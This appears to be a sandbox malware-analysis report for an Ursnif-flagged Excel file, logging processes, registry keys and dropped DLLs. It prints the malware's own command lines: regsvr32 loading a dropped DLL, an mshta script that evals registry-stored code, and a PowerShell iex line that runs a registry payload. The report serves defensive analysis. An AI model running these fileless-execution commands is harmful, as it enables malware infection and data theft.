Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB8005 NtQueryVirtualMemory, 19_2_00FB8005
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E2206 3_2_001E2206
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E3109 3_2_001E3109
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7DE0 3_2_001E7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB2206 19_2_00FB2206
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7DE0 19_2_00FB7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB3109 19_2_00FB3109
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@31/52@7/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification, 3_2_001E513E
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{C75402C6-E233-4D86-BA8E-1D986541630A} - OProcSessId.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: documentation_39236.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Registers a DLL
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7A60 push ecx; ret 3_2_001E7A69
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E7DCF push ecx; ret 3_2_001E7DDF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7A60 push ecx; ret 19_2_00FB7A69
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB7DCF push ecx; ret 19_2_00FB7DDF

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
